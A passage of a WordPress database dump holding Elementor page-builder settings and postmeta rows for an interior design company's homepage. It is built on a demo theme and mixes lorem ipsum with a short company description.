us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3272,4773,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3273,4773,'_elementor_pro_version','3.8.1'),(3274,4773,'_elementor_css','a:6:{s:4:\"time\";i:1685011164;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3275,4774,'_edit_lock','1695374591:3'),(3276,2955,'_elementor_inline_svg','<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"470\" height=\"520\" viewBox=\"0 0 470 520\"><defs><style>      .cls-1 {        fill: #242424;        fill-rule: evenodd;      }    </style></defs><path id=\"base\" class=\"cls-1\" d=\"M375,940l470,55.319V1404.68L375,1460V940Z\" transform=\"translate(-375 -940)\"></path></svg>'),(3277,2954,'_elementor_inline_svg','<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"470\" height=\"520\" viewBox=\"0 0 470 520\"><defs><style>      .cls-1 {        fill: #1d1d1d;        fill-rule: evenodd;      }    </style></defs><path id=\"base\" class=\"cls-1\" d=\"M914,940L444,995.318V1404.68L914,1460V940Z\" transform=\"translate(-444 -940)\"></path></svg>'),(3278,4774,'_thumbnail_id','2415'),(3279,4774,'_edit_last','3'),(3280,4774,'ova_sev_met_icon','flaticon-buildings'),(3281,4774,'ova_sev_met_order_sev','1'),(3283,4775,'_edit_lock','1695374644:3'),(3284,4775,'_thumbnail_id','2415'),(3285,4775,'_edit_last','3'),(3286,4775,'ova_sev_met_icon','flaticon-buildings'),(3287,4775,'ova_sev_met_order_sev','2'),(3290,4775,'_elementor_css','a:7:{s:4:\"time\";i:1685011866;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(3291,4776,'_edit_lock','1695375078:3'),(3292,4776,'_thumbnail_id','2415'),(3293,4776,'_edit_last','3'),(3294,4776,'ova_sev_met_icon','flaticon-buildings'),(3295,4776,'ova_sev_met_order_sev','3'),(3298,4776,'_elementor_css','a:7:{s:4:\"time\";i:1685011920;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:5:\"empty\";i:0;s:0:\"\";s:3:\"css\";s:0:\"\";}'),(3299,4777,'_wp_page_template','elementor_header_footer'),(3300,4777,'_elementor_edit_mode','builder'),(3301,4777,'_elementor_template_type','wp-page'),(3302,4777,'_elementor_version','3.8.1'),(3303,4777,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Philip-Johnson.jpg\",\"id\":1161,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/pexels-lina-kivaka-1841143.jpg\",\"id\":2991,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_bac